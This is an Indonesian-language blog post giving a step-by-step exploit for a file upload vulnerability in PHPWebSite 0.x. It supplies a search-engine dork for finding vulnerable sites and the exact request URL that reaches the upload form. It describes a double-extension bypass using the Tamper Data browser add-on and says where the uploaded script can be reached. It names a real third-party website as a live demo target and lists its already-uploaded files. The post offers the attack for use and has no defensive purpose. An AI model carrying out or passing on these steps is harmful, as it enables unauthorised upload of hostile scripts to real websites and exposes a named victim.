PHPWebSite 0.x Upload Vulnerability

Assalamualaikum, maap yak kalo gua jarang update >,< . soalnya kemaren kemaren gua lagi UKK Sekarang sudah selesai, kembali update blog dan gua kali ini share exploit PHPWebSite 0.x Upload Vulnerability 1. Masukan dork ini ke search engine [google,bing,dll]

inurl:/index.php?module=announce

2. Lalu kalau sudah, hapus url /index.php?*blabla dan ganti dengan url ini

/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

Contoh yang sudah jadi begini

http://example.com//index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

3. Kalau ente beruntung, ketemu yang ada form uploadnya. lalu rubah script ente jadi script.html.jpg 4. Upload dengan tamper data. kalau belum tau, nih ane kasih tau

pastikan browser mu firefox dan sudah ada tamper data. start tamper > klik save diwebsite [bagian bawah] > nanti ada notice dari tamper data klik sumbit > dibagian kanan, cari nama scriptmu, lalu hapus .jpg nya > tinggal ok ok doang [ane lupa tombolnya]

5. Akses script mu di

http://example.com/images/announce/scriptmu.html

Demo :

http://www.viethoc.org/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

Contoh yang sudah di upload

http://www.viethoc.org/images/announce/